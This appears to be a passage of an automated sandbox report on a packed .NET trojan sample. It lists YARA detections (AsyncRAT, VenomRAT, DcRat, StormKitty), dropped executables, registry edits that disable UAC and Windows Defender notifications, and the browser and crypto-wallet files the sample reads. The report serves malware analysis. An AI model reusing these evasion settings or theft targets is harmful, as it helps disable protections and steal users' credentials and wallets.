Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: promptonsecuredesktop 0

Disable Windows Defender notifications (registry)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration

Registry value created: Notification_Suppress 1

Disables UAC (registry)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: MSASCui.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: procexp.exe
Source: Loaader.exe, 00000015.00000002.3522971860.000000001B940000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3532252741.000000001BBEC000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3549502589.000000001BCF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Amcache.hve.30.dr, Loaader.exe.3.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png	Jump to behavior
